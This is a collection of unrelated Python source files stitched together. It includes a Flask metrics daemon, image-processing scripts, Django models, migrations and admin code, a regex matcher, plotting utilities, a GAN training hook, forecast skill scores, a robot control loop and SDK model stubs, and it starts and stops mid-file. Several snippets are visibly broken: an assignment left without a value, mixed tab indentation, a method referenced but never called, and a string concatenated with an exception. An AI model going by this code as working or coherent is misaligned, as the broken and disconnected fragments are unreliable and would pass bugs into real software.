            resp = json.dumps({'results': 'Error: No metric by that name'})
            return resp, 404
        else:
            unpacker = Unpacker(use_list = False)
            unpacker.feed(raw_series)
            timeseries = [item[:2] for item in unpacker]
            resp = json.dumps({'results': timeseries})
            return resp, 200
    except Exception as e:
        error = "Error: " + e
        resp = json.dumps({'results': error})
        return resp, 500


class App():
    def __init__(self):
        self.stdin_path = '/dev/null'
        self.stdout_path = settings.LOG_PATH + '/webapp.log'
        self.stderr_path = settings.LOG_PATH + '/webapp.log'
        self.pidfile_path = settings.PID_PATH + '/webapp.pid'
        self.pidfile_timeout = 5

    def run(self):

        logger.info('starting webapp')
        logger.info('hosted at %s' % settings.WEBAPP_IP)
        logger.info('running on port %d' % settings.WEBAPP_PORT)

        app.run(settings.WEBAPP_IP, settings.WEBAPP_PORT)

if __name__ == "__main__":
    """
    Start the server
    """

    webapp = App()

    logger = logging.getLogger("AppLog")
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter("%(asctime)s :: %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
    handler = logging.FileHandler(settings.LOG_PATH + '/webapp.log')
    handler.setFormatter(formatter)
    logger.addHandler(handler)

    if len(sys.argv) > 1 and sys.argv[1] == 'run':
        webapp.run()
    else:
        daemon_runner = runner.DaemonRunner(webapp)
        daemon_runner.daemon_context.files_preserve = [handler.stream]
        daemon_runner.do_action()

from PIL import Image
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np

img1 = Image.open('multipage.tif')

# The following approach seems to be having issue with the 
# current TIFF format data

print('The size of each frame is:')
print(img1.size)

# Plots first frame
print('Frame 1')
fig1 = plt.figure(1)
img1.seek(0)
# for i in range(250):
    # pixA11 = img1.getpixel((1,i))
    # print(pixA11)
f1 = list(img1.getdata())
print(f1[1000])
plt.imshow(img1)
fig1.show()
input()


# Plots eleventh frame
# print('Frame 11')
# fig2 = plt.figure(2)
# img1.seek(10)
# # for i in range(250):
    # # pixB11 = img1.getpixel((1,i))
    # # print(pixB11)
# f2 = list(img1.getdata())
# print(f2[10000])
# plt.imshow(img1)
# fig2.show()
# input()

# Create a new image
fig3 = plt.figure(3)
imgAvg = Image.new(img1.mode, img1.size)
print(img1.mode)
print(img1.size)
fAvg = list()
pix = imgAvg.load()
for i in range(512):
    for j in range(512):
        pixVal = (f1[i*512+j] + f1[i*512+j]) / 2
        # fAvg.append(pixVal)
        fAvg.insert(i*512+j,pixVal)
imgAvg.putdata(fAvg)
imgAvg.save('avg.tiff')
plt.imshow(imgAvg)
fig3.show()
print('Average')


# The following is necessary to keep the above figures 'alive'
input()



# data = random.random((256, 256))
# img1 = Image.fromarray(data)
# img1.save('test.tiff')

class R:
    def __init__(self, c):
        self.c = c
        self.is_star = False

    def match(self, c):
        return self.c == '.' or self.c == c


class Solution(object):
    def isMatch(self, s, p):
        """
        :type s: str
        :type p: str
        :rtype: bool
        """
        rs = []
        """:type: list[R]"""

        for c in p:
            if c == '*':
                rs[-1].is_star = True
            else:
                rs.append(R(c))

        lr = len(rs)
        ls = len(s)
        s += '\0'

        dp = [[False] * (ls + 1) for _ in range(lr + 1)]
        dp[0][0] = True

        for i, r in enumerate(rs):
            for j in range(ls + 1):
                c = s[j - 1]

                if r.is_star:
                    dp[i + 1][j] = dp[i][j]

                    if j and r.match(c):
                        dp[i + 1][j] |= dp[i + 1][j - 1]
                else:
                    if j and r.match(c):
                        dp[i + 1][j] = dp[i][j - 1]
        return dp[-1][-1]

from flask import Flask, render_template, flash
from flask_material_lite import Material_Lite
from flask_appconfig import AppConfig
from flask_wtf import Form, RecaptchaField
from flask_wtf.file import FileField
from wtforms import TextField, HiddenField, ValidationError, RadioField,\
    BooleanField, SubmitField, IntegerField, FormField, validators
from wtforms.validators import Required


# straight from the wtforms docs:
class TelephoneForm(Form):
    country_code = IntegerField('Country Code', [validators.required()])
    area_code = IntegerField('Area Code/Exchange', [validators.required()])
    number = TextField('Number')


class ExampleForm(Form):
    field1 = TextField('First Field', description='This is field one.')
    field2 = TextField('Second Field', description='This is field two.',
                       validators=[Required()])
    hidden_field = HiddenField('You cannot see this', description='Nope')
    recaptcha = RecaptchaField('A sample recaptcha field')
    radio_field = RadioField('This is a radio field', choices=[
        ('head_radio', 'Head radio'),
        ('radio_76fm', "Radio '76 FM"),
        ('lips_106', 'Lips 106'),
        ('wctr', 'WCTR'),
    ])
    checkbox_field = BooleanField('This is a checkbox',
                                  description='Checkboxes can be tricky.')

    # subforms
    mobile_phone = FormField(TelephoneForm)

    # you can change the label as well
    office_phone = FormField(TelephoneForm, label='Your office phone')

    ff = FileField('Sample upload')

    submit_button = SubmitField('Submit Form')


    def validate_hidden_field(form, field):
        raise ValidationError('Always wrong')


def create_app(configfile=None):
    app = Flask(__name__)
    AppConfig(app, configfile)  # Flask-Appconfig is not necessary, but
                                # highly recommend =)
                                # https://github.com/mbr/flask-appconfig
    Material_Lite(app)

    # in a real app, these should be configured through Flask-Appconfig
    app.config['SECRET_KEY'] = 'devkey'
    app.config['RECAPTCHA_PUBLIC_KEY'] = \
        '6Lfol9cSAAAAADAkodaYl9wvQCwBMr3qGR_PPHcw'

    @app.route('/', methods=('GET', 'POST'))
    def index():
        form = ExampleForm()
        form.validate_on_submit()  # to get error messages to the browser
        flash('critical message', 'critical')
        flash('error message', 'error')
        flash('warning message', 'warning')
        flash('info message', 'info')
        flash('debug message', 'debug')
        flash('different message', 'different')
        flash('uncategorized message')
        return render_template('index.html', form=form)

    return app

if __name__ == '__main__':
    create_app().run(debug=True)

#!/usr/bin/env python3

from __future__ import print_function, division

import numpy as np
from sht.grids import standard_grid, get_cartesian_grid

def test_grids():
    L = 10
    thetas, phis = standard_grid(L)

    # Can't really test much here
    assert thetas.size == L
    assert phis.size == L**2

    grid = get_cartesian_grid(thetas, phis)
    assert grid.shape == (L**2, 3)


"""
Visualize possible stitches with the outcome of the validator.
"""

import math
import random
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np

from mpl_toolkits.mplot3d import Axes3D

import stitcher

SPACE = 25
TYPE_FORMAT = {'a': '^', 'b': 's', 'c': 'v'}


def show(graphs, request, titles, prog='neato', size=None,
         type_format=None, filename=None):
    """
    Display the results using matplotlib.
    """
    if not size:
        size = _get_size(len(graphs))
    fig, axarr = plt.subplots(size[0], size[1], figsize=(18, 10))
    fig.set_facecolor('white')
    x_val = 0
    y_val = 0
    index = 0

    if size[0] == 1:
        axarr = np.array(axarr).reshape((1, size[1]))

    for candidate in graphs:
        # axarr[x_val, y_val].axis('off')
        axarr[x_val, y_val].xaxis.set_major_formatter(plt.NullFormatter())
        axarr[x_val, y_val].yaxis.set_major_formatter(plt.NullFormatter())
        axarr[x_val, y_val].xaxis.set_ticks([])
        axarr[x_val, y_val].yaxis.set_ticks([])
        axarr[x_val, y_val].set_title(titles[index])
#        axarr[x_val, y_val].set_axis_bgcolor("white")
        if not type_format:
            type_format = TYPE_FORMAT
        _plot_subplot(candidate, request.nodes(), prog, type_format,
                      axarr[x_val, y_val])
        y_val += 1
        if y_val > size[1] - 1:
            y_val = 0
            x_val += 1
        index += 1
    fig.tight_layout()
    if filename is not None:
        plt.savefig(filename)
    else:
        plt.show()
    plt.close()


def _plot_subplot(graph, new_nodes, prog, type_format, axes):
    """
    Plot a single candidate graph.
    """
    pos = nx.nx_agraph.graphviz_layout(graph, prog=prog)

    # draw the nodes
    for node, values in graph.nodes(data=True):
        shape = 'o'
        if values[stitcher.TYPE_ATTR] in type_format:
            shape = type_format[values[stitcher.TYPE_ATTR]]
        color = 'g'
        alpha = 0.8
        if node in new_nodes:
            color = 'b'
            alpha = 0.2
        elif 'rank' in values and values['rank'] > 7:
            color = 'r'
        elif 'rank' in values and values['rank'] < 7 and values['rank'] > 3:
            color = 'y'
        nx.draw_networkx_nodes(graph, pos, nodelist=[node], node_color=color,
                               node_shape=shape, alpha=alpha, ax=axes)

    # draw the edges
    dotted_line = []
    normal_line = []
    for src, trg in graph.edges():
        if src in new_nodes and trg not in new_nodes:
            dotted_line.append((src, trg))
        else:
            normal_line.append((src, trg))
    nx.draw_networkx_edges(graph, pos, edgelist=dotted_line, style='dotted',
                           ax=axes)
    nx.draw_networkx_edges(graph, pos, edgelist=normal_line, ax=axes)

    # draw labels
    nx.draw_networkx_labels(graph, pos, ax=axes)


def show_3d(graphs, request, titles, prog='neato', filename=None):
    """
    Show the candidates in 3d - the request elevated above the container.
    """
    fig = plt.figure(figsize=(18, 10))
    fig.set_facecolor('white')
    i = 0

    size = _get_size(len(graphs))

    for graph in graphs:
        axes = fig.add_subplot(size[0], size[1], i+1,
                               projection=Axes3D.name)
        axes.set_title(titles[i])
        axes._axis3don = False

        _plot_3d_subplot(graph, request, prog, axes)

        i += 1
    fig.tight_layout()
    if filename is not None:
        plt.savefig(filename)
    else:
        plt.show()
    plt.close()


def _plot_3d_subplot(graph, request, prog, axes):
    """
    Plot a single candidate graph in 3d.
    """
    cache = {}

    tmp = graph.copy()
    for node in request.nodes():
        tmp.remove_node(node)

    pos = nx.nx_agraph.graphviz_layout(tmp, prog=prog)

    # the container
    for item in tmp.nodes():
        axes.plot([pos[item][0]], [pos[item][1]], [0], linestyle="None",
                  marker="o", color='gray')
        axes.text(pos[item][0], pos[item][1], 0, item)

    for src, trg in tmp.edges():
        axes.plot([pos[src][0], pos[trg][0]],
                  [pos[src][1], pos[trg][1]],
                  [0, 0], color='gray')

    # the new nodes
    for item in graph.nodes():
        if item in request.nodes():
            for nghb in graph.neighbors(item):
                if nghb in tmp.nodes():
                    x_val = pos[nghb][0]
                    y_val = pos[nghb][1]
                    if (x_val, y_val) in list(cache.values()):
                        x_val = pos[nghb][0] + random.randint(10, SPACE)
                        y_val = pos[nghb][0] + random.randint(10, SPACE)
                    cache[item] = (x_val, y_val)

                    # edge
                    axes.plot([x_val, pos[nghb][0]],
                              [y_val, pos[nghb][1]],
                              [SPACE, 0], color='blue')

            axes.plot([x_val], [y_val], [SPACE], linestyle="None", marker="o",
                      color='blue')
            axes.text(x_val, y_val, SPACE, item)

    for src, trg in request.edges():
        if trg in cache and src in cache:
            axes.plot([cache[src][0], cache[trg][0]],
                      [cache[src][1], cache[trg][1]],
                      [SPACE, SPACE], color='blue')


def _get_size(n_items):
    """
    Calculate the size of the subplot layouts based on number of items.
    """
    n_cols = math.ceil(math.sqrt(n_items))
    n_rows = math.floor(math.sqrt(n_items))
    if n_cols * n_rows < n_items:
        n_cols += 1
    return int(n_rows), int(n_cols)

# -*- coding: utf-8 -*-

# django-simple-help
# simple_help/admin.py

from __future__ import unicode_literals

from django.contrib import admin

try:  # add modeltranslation
    from modeltranslation.translator import translator
    from modeltranslation.admin import TabbedDjangoJqueryTranslationAdmin
except ImportError:
    pass

from simple_help.models import PageHelp
from simple_help.forms import PageHelpAdminForm
from simple_help.utils import modeltranslation
try:
    from simple_help.translation import PageHelpTranslationOptions
except ImportError:
    pass


__all__ = [
    "PageHelpAdmin",
]


class PageHelpAdmin(TabbedDjangoJqueryTranslationAdmin if modeltranslation() else admin.ModelAdmin):
    """
    Customize PageHelp model for admin area.
    """

    list_display = ["page", "title", ]
    search_fields = ["title", ]
    list_filter = ["page", ]

    form = PageHelpAdminForm


if modeltranslation():
    # registering translation options
    translator.register(PageHelp, PageHelpTranslationOptions)


# registering admin custom classes
admin.site.register(PageHelp, PageHelpAdmin)

# -*- coding: utf-8 -*-
import sys
from io import BytesIO
import argparse
from PIL import Image

from .api import crop_resize

parser = argparse.ArgumentParser(
    description='crop and resize an image without aspect ratio distortion.')
parser.add_argument('image')
parser.add_argument('-w', '-W', '--width', metavar='<width>', type=int,
                    help='desired width of image in pixels')
parser.add_argument('-H', '--height', metavar='<height>', type=int,
                    help='desired height of image in pixels')
parser.add_argument('-f', '--force', action='store_true',
                    help='whether to scale up for smaller images')
parser.add_argument('-d', '--display', action='store_true', default=False,
                    help='display the new image (don\'t write to file)')
parser.add_argument('-o', '--output', metavar='<file>',
                    help='Write output to <file> instead of stdout.')


def main():
    parsed_args = parser.parse_args()
    image = Image.open(parsed_args.image)
    size = (parsed_args.width, parsed_args.height)
    new_image = crop_resize(image, size, parsed_args.force)
    if parsed_args.display:
        new_image.show()
    elif parsed_args.output:
        new_image.save(parsed_args.output)
    else:
        f = BytesIO()
        new_image.save(f, image.format)
        try:
            stdout = sys.stdout.buffer
        except AttributeError:
            stdout = sys.stdout
        stdout.write(f.getvalue())

from __future__ import print_function
import os
import sys
import subprocess
import pkg_resources

try:
    import pkg_resources
    _has_pkg_resources = True
except:
    _has_pkg_resources = False

try:
    import svn.local
    _has_svn_local = True
except:
    _has_svn_local = False
    
def test_helper():
    return "test helper text"

def dict_to_str(d):
    """
    Given a dictionary d, return a string with 
    each entry in the form 'key: value' and entries
    separated by newlines.
    """
    vals = []
    for k in d.keys():
        vals.append('{}: {}'.format(k, d[k]))
    v = '\n'.join(vals)
    return v

def module_version(module, label=None):
    """
    Helper function for getting the module ("module") in the current
    namespace and their versions.
    
    The optional argument 'label' allows you to set the 
    string used as the dictionary key in the returned dictionary.

    By default the key is '[module] version'.
    """
    if not _has_pkg_resources:
        return {}
    version = pkg_resources.get_distribution(module).version
    if label:
        k = '{}'.format(label)
    else:
        k = '{} version'.format(module)
    return {k: '{}'.format(version)}

def file_contents(filename, label=None):
    """
    Helper function for getting the contents of a file,
    provided the filename.
    
    Returns a dictionary keyed (by default) with the filename
    where the value is a string containing the contents of the file.
    
    The optional argument 'label' allows you to set the 
    string used as the dictionary key in the returned dictionary.
    """
    if not os.path.isfile(filename):
        print('ERROR: {} NOT FOUND.'.format(filename))
        return {}
    else:
        fin = open(filename, 'r')
        contents = ''
        for l in fin:
            contents += l
        if label:
            d = {'{}'.format(label): contents}
        else:
            d = {filename: contents}
        return d

def svn_information(svndir=None, label=None):
    """
    Helper function for obtaining the SVN repository
    information for the current directory (default)
    or the directory supplied in the svndir argument.
    
    Returns a dictionary keyed (by default) as 'SVN INFO'
    where the value is a string containing essentially what
    is returned by 'svn info'.
    
    The optional argument 'label' allows you to set the 
    string used as the dictionary key in the returned dictionary.
    """
    if not _has_svn_local:
        print('SVN information unavailable.')
        print('You do not have the "svn" package installed.')
        print('Install "svn" from pip using "pip install svn"')
        return {}
    if svndir:
        repo = svn.local.LocalClient(svndir)
    else:
        repo = svn.local.LocalClient(os.getcwd())
    try:
        # Get a dictionary of the SVN repository information
        info = repo.info()
    except:
        print('ERROR: WORKING DIRECTORY NOT AN SVN REPOSITORY.')
        return {}
    v = dict_to_str(info)
    if label:
        k = '{}'.format(label)
    else:
        k = 'SVN INFO'
    return {k: v}

def get_git_hash(gitpath=None, label=None):
    """
    Helper function for obtaining the git repository hash.
    for the current directory (default)                                          
    or the directory supplied in the gitpath argument.

    Returns a dictionary keyed (by default) as 'GIT HASH'
    where the value is a string containing essentially what
    is returned by subprocess.  

    The optional argument 'label' allows you to set the string 
    used as the dictionary key in the returned dictionary.
    """
    if gitpath:
        thisdir = os.getcwd()
        os.chdir(gitpath)
        
    try:
        sha = subprocess.check_output(['git','rev-parse','HEAD'],shell=False).strip()
    except subprocess.CalledProcessError as e:
        print("ERROR: WORKING DIRECTORY NOT A GIT REPOSITORY")
        return {}
    
    if label:
        l = '{}'.format(label)
    else:
        l = 'GIT HASH'

    return {l:sha}

def get_source_code(scode,sourcepath=None, label=None):
    """
    Helper function for obtaining the source code.
    for the current directory (default) or the directory
    supplied in the sourcepath argument.

    Returns a dictionary keyed (by default) as 'source code'
    where the value is a string containing the source code.  

    The optional argument 'label' allows you to set the string 
    used as the dictionary key in the returned dictionary.
    """
    
    if sourcepath:
        os.chdir(sourcepath)
        
    if not os.path.isfile(scode):
        print('ERROR: {} NOT FOUND.'.format(scode))
        return {}
    
    else:
        with open(scode,'r') as f:
            s = f.read()
        if label:
            n = {'{}'.format(label):s}
        else:
            n = {'source code':s}
    return n
            

from django.db import models

from .workflow import TestStateMachine


class TestModel(models.Model):
    name = models.CharField(max_length=100)
    state = models.CharField(max_length=20, null=True, blank=True)
    state_num = models.IntegerField(null=True, blank=True)
    other_state = models.CharField(max_length=20, null=True, blank=True)
    message = models.CharField(max_length=250, null=True, blank=True)

    class Meta:
        permissions = TestStateMachine.get_permissions('testmodel', 'Test')


# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('geokey_sapelli', '0005_sapellifield_truefalse'),
    ]

    operations = [
        migrations.AddField(
            model_name='sapelliproject',
            name='sapelli_fingerprint',
            field=models.IntegerField(default=-1),
            preserve_default=False,
        ),
    ]


from __future__ import division, print_function #, unicode_literals

"""
Multiples of 3 and 5

If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.

Find the sum of all the multiples of 3 or 5 below 1000.
"""

import numpy as np

# Setup.

num_max = 1000

basis = [3, 5]

factors = []

for i in range(num_max):
    for k in basis:
        if not i % k:
            factors.append(i)
            break

print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))

# Done.


s="the     quick brown fox jumped over the lazy dog"
t = s.split(" ")
for v in t:
    print(v)
r = s.split("e")
for v in r:
    print(v)
x = s.split()
for v in x:
    print(v)

# 2-arg version of split not supported
# y = s.split(" ",7)
# for v in y:
#     print v

import torch
from hypergan.train_hooks.base_train_hook import BaseTrainHook

class NegativeMomentumTrainHook(BaseTrainHook):
  def __init__(self, gan=None, config=None, trainer=None):
      super().__init__(config=config, gan=gan, trainer=trainer)
      self.d_grads = None
      self.g_grads = None

  def gradients(self, d_grads, g_grads):
      if self.d_grads is None:
          self.d_grads = [torch.zeros_like(_g) for _g in d_grads]
          self.g_grads = [torch.zeros_like(_g) for _g in g_grads]
      
      new_d_grads = [g.clone() for g in d_grads]
      new_g_grads = [g.clone() for g in g_grads]
      d_grads = [_g - self.config.gamma * _g2 for _g, _g2 in zip(d_grads, self.d_grads)]
      g_grads = [_g - self.config.gamma * _g2 for _g, _g2 in zip(g_grads, self.g_grads)]
      self.d_grads = new_d_grads
      self.g_grads = new_g_grads

      return [d_grads, g_grads]

import numpy as np

__author__ = 'David John Gagne <djgagne@ou.edu>'


def main():
    # Contingency Table from Wilks (2011) Table 8.3
    table = np.array([[50, 91, 71],
                      [47, 2364, 170],
                      [54, 205, 3288]])
    mct = MulticlassContingencyTable(table, n_classes=table.shape[0],
                                     class_names=np.arange(table.shape[0]).astype(str))
    print(mct.peirce_skill_score())
    print(mct.gerrity_score())


class MulticlassContingencyTable(object):
    """
    This class is a container for a contingency table containing more than 2 classes.
    The contingency table is stored in table as a numpy array with the rows corresponding to forecast categories,
    and the columns corresponding to observation categories.
    """

    def __init__(self, table=None, n_classes=2, class_names=("1", "0")):
        self.table = table
        self.n_classes = n_classes
        self.class_names = class_names
        if table is None:
            self.table = np.zeros((self.n_classes, self.n_classes), dtype=int)

    def __add__(self, other):
        assert self.n_classes == other.n_classes, "Number of classes does not match"
        return MulticlassContingencyTable(self.table + other.table,
                                          n_classes=self.n_classes,
                                          class_names=self.class_names)

    def peirce_skill_score(self):
        """
        Multiclass Peirce Skill Score (also Hanssen and Kuipers score, True Skill Score)
        """
        n = float(self.table.sum())
        nf = self.table.sum(axis=1)
        no = self.table.sum(axis=0)
        correct = float(self.table.trace())
        return (correct / n - (nf * no).sum() / n ** 2) / (1 - (no * no).sum() / n ** 2)

    def gerrity_score(self):
        """
        Gerrity Score, which weights each cell in the contingency table by its observed relative frequency.
        :return:
        """
        k = self.table.shape[0]
        n = float(self.table.sum())
        p_o = self.table.sum(axis=0) / n
        p_sum = np.cumsum(p_o)[:-1]
        a = (1.0 - p_sum) / p_sum
        s = np.zeros(self.table.shape, dtype=float)
        for (i, j) in np.ndindex(*s.shape):
            if i == j:
                s[i, j] = 1.0 / (k - 1.0) * (np.sum(1.0 / a[0:j]) + np.sum(a[j:k - 1]))
            elif i < j:
                s[i, j] = 1.0 / (k - 1.0) * (np.sum(1.0 / a[0:i]) - (j - i) + np.sum(a[j:k - 1]))
            else:
                s[i, j] = s[j, i]
        return np.sum(self.table / float(self.table.sum()) * s)

    def heidke_skill_score(self):
        n = float(self.table.sum())
        nf = self.table.sum(axis=1)
        no = self.table.sum(axis=0)
        correct = float(self.table.trace())
        return (correct / n - (nf * no).sum() / n ** 2) / (1 - (nf * no).sum() / n ** 2)


if __name__ == "__main__":
    main()

from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User, Group, Permission
from simple_history import register

from celsius.tools import register_for_permission_handling

register(User)
register(Group)

register_for_permission_handling(User)
register_for_permission_handling(Group)
register_for_permission_handling(Permission)
register_for_permission_handling(LogEntry)

from django import forms
from miniURL.models import Redirection


#Pour faire un formulaire depuis un modèle. (/!\ héritage différent)
class RedirectionForm(forms.ModelForm):
    class Meta:
        model = Redirection
        fields = ('real_url', 'pseudo')

# Pour récupérer des données cel apeut ce faire avec un POST
# ou directement en donnant un objet du modele :
#form = ArticleForm(instance=article)  # article est bien entendu un objet d'Article quelconque dans la base de données
# Le champs est ainsi préremplit.

# Quand on a recu une bonne formeModele il suffit de save() pour la mettre en base
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 21:11:45 2017

@author: hubert
"""

import numpy as np
import matplotlib.pyplot as plt


class LiveBarGraph(object):
    """
    """
    def __init__(self, band_names=['delta', 'theta', 'alpha', 'beta'],
                 ch_names=['TP9', 'AF7', 'AF8', 'TP10']):
        """
        """
        self.band_names = band_names
        self.ch_names = ch_names
        self.n_bars = self.band_names * self.ch_names

        self.x =

        self.fig, self.ax = plt.subplots()
        self.ax.set_ylim((0, 1))

        y = np.zeros((self.n_bars,))
        x = range(self.n_bars)

        self.rects = self.ax.bar(x, y)

    def update(self, new_y):
        [rect.set_height(y) for rect, y in zip(self.rects, new_y)]


if __name__ == '__main__':

    bar = LiveBarGraph()
    plt.show()

    while True:
        bar.update(np.random.random(10))
        plt.pause(0.1)






# -*- coding: utf-8 -*-
from modules import Robot
import time

r = Robot.Robot()
state = [0, 1000, 1500]
(run, move, write) = range(3)
i = run
slowdown = 1
flag_A = 0
flag_C = 0
lock = [0, 0, 0, 0]

while(True):
    a = r.Read()
    for it in range(len(lock)):
        if lock[it]:
            lock[it] = lock[it] - 1

    if a[0]:                                        # kontrolka ciągła
        flag_A = 0
        flag_C = 0
        if a[0] == 1 or a[0] == 5 or a[0] == 6:
            r.A.run_forever(r.S/slowdown)
        elif a[0] == 2 or a[0] == 7 or a[0] == 8:
            r.A.run_forever(-r.S/slowdown)
        else:
            r.A.stop()
        if a[0] == 3 or a[0] == 5 or a[0] == 7:
            r.C.run_forever(r.S/slowdown)
        elif a[0] == 4 or a[0] == 6 or a[0] == 8:
            r.C.run_forever(-r.S/slowdown)
        else:
            r.C.stop()

    elif a[1] and not lock[1]:                         # kontrolka lewa: dyskretna
        if a[1] == 1 and i is not run:              # kontrolka prawa: ciągła
            r.changestate(state[i]-state[i-1])
            i = i-1
            time.sleep(0.5)                         # (state[i]-state[i-1])/r.S
            if i is run:
                slowdown = 1
        elif a[1] == 2 and i is not write:
            r.changestate(state[i]-state[i+1])
            i = i+1
            slowdown = 5
            time.sleep(0.5)                         # (state[i+1]-state[i])/r.S
        elif a[1] == 3:
            r.B.run_forever(r.S)
        elif a[1] == 4:
            r.B.run_forever(-r.S)
        elif a[1] == 9:
	    r.B.stop() 
        else:
            pass

    elif a[2]:                                      # kontrolka one-klick
        if a[2] == 1 or a[2] == 5 or a[2] == 6:     # stop na 9 (beacon)
                if flag_A == -1:
                        r.A.stop()
                        flag_A = 0
                        lock[0] = 30                # lock = 30
                elif not lock[0]:
                        r.A.run_forever(r.S/slowdown)
                        flag_A = 1
        elif a[2] == 2 or a[2] == 7 or a[2] == 8:
            if flag_A == 1:
                r.A.stop()
                flag_A = 0
                lock[1] = 30                        # lock = 30
            elif not lock[1]:
                r.A.run_forever(-r.S/slowdown)
                flag_A = -1
        if a[2] == 3 or a[2] == 5 or a[2] == 7:
            if flag_C == -1:
                r.C.stop()
                flag_C = 0
                lock[2] = 30                        # lock = 30
            elif not lock[2]:
                r.C.run_forever(r.S/slowdown)
                flag_C = 1
        elif a[2] == 4 or a[2] == 6 or a[2] == 8:
            if flag_C == 1:
                r.C.stop
                flag_C = 0
                lock[3] = 30                        # lock = 30
            elif not lock[3]:
                r.C.run_forever(-r.S/slowdown)
                flag_C = -1
        if a[2] == 9:
            r.stop()
            flag_A = 0
            flag_C = 0

    elif a[3]:                                      # alternatywna one-klick
        if a[3] == 1:                               # 1 przycisk - oba silniki
            if flag_A == -1 and flag_C == -1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[0] = 30                        # lock = 30
            elif not lock[0]:
                r.run(r.S/slowdown, r.S/slowdown)
                flag_A = 1
                flag_C = 1
        elif a[3] == 2:
            if flag_A == 1 and flag_C == 1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[1] = 30                        # lock = 30
            elif not lock[1]:
                r.run(-r.S/slowdown, -r.S/slowdown)
                flag_A = -1
                flag_C = -1
        elif a[3] == 3:
            if flag_A == 1 and flag_C == -1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[2] = 30                        # lock = 30
            elif not lock[2]:
                r.run(-r.S/slowdown, r.S/slowdown)
                flag_A = -1
                flag_C = 1
        elif a[3] == 4:
            if flag_A == -1 and flag_C == 1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[3] = 30                        # lock = 30
            elif not lock[3]:
                r.run(r.S/slowdown, -r.S/slowdown)
                flag_A = 1
                flag_C = -1
        elif a[3] == 9:
            r.stop()
            flag_A = 0
            flag_C = 0
    else:
        if not flag_A:
            r.A.stop()
        if not flag_C:
            r.C.stop()


# -*- coding: utf-8 -*-

from django.db import models
from Corretor.base import CorretorException
from Corretor.base import ExecutorException
from Corretor.base import CompiladorException
from Corretor.base import ComparadorException
from Corretor.base import LockException
from model_utils import Choices


class RetornoCorrecao(models.Model):
    """Um modelo que possui informacoes sobre o retorno da correcao de uma questao(ou questao de avaliacao).
    """
    TIPOS = Choices(
                       (0,'loading',u'Loading'),
                       (1,'compilacao',u'Compilação'),
                       (2,'execucao',u'Execução'),
                       (3,'comparacao',u'Comparação'),
                       (4,'lock',u'Lock'),
                       (5,'correto',u'Correto'),
                   )
    tipo =  models.SmallIntegerField(u"Tipo",choices=TIPOS, default=TIPOS.loading)
    msg = models.TextField(u"Mensagem",blank=True,null=True)
    task_id = models.CharField(max_length=350,blank=True,null=True)
    class Meta:
        verbose_name = u'Retorno Correção'
        app_label = 'Corretor'


    def __unicode__(self):
        return "%s: %s" %(self.TIPOS[self.tipo][1],self.msg)

    def altera_dados(self,sucesso=True,erroException=None):
        """
        Altera os dados do retorno atual para pegar os dados de erro ou para por a mensagem
        que foi com sucesso.
        """

        tipo = RetornoCorrecao.TIPOS.correto
        correcao_msg = "Correto!"
        # print ">>altera_dados"
        # print ">>isinstance(erroException,CorretorException)",isinstance(erroException,CorretorException)

        if sucesso == True:
            # print ">>retorno.successful()"
            tipo = RetornoCorrecao.TIPOS.correto
            correcao_msg = "Correto!"
        elif isinstance(erroException,CorretorException):
            # print "erro: %s" % erroException.message
            if isinstance(erroException,ExecutorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.execucao
            if isinstance(erroException,CompiladorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.compilacao
            if isinstance(erroException,ComparadorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.comparacao
            if isinstance(erroException,LockException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.lock

        self.tipo = tipo
        self.msg = correcao_msg

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from .sub_resource import SubResource


class ApplicationGatewaySslPredefinedPolicy(SubResource):
    """An Ssl predefined policy.

    :param id: Resource ID.
    :type id: str
    :param name: Name of Ssl predefined policy.
    :type name: str
    :param cipher_suites: Ssl cipher suites to be enabled in the specified
     order for application gateway.
    :type cipher_suites: list[str or
     ~azure.mgmt.network.v2017_10_01.models.ApplicationGatewaySslCipherSuite]
    :param min_protocol_version: Minimum version of Ssl protocol to be
     supported on application gateway. Possible values include: 'TLSv1_0',
     'TLSv1_1', 'TLSv1_2'
    :type min_protocol_version: str or
     ~azure.mgmt.network.v2017_10_01.models.ApplicationGatewaySslProtocol
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
        'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.cipher_suites = kwargs.get('cipher_suites', None)
        self.min_protocol_version = kwargs.get('min_protocol_version', None)

from util.tipo import tipo
class S_PARTY_MEMBER_INTERVAL_POS_UPDATE(object):

    def __init__(self, tracker, time, direction, opcode, data):
        print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])

"""Auto-generated file, do not edit by hand. BG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata

PHONE_METADATA_BG = PhoneMetadata(id='BG', country_code=359, international_prefix='00',
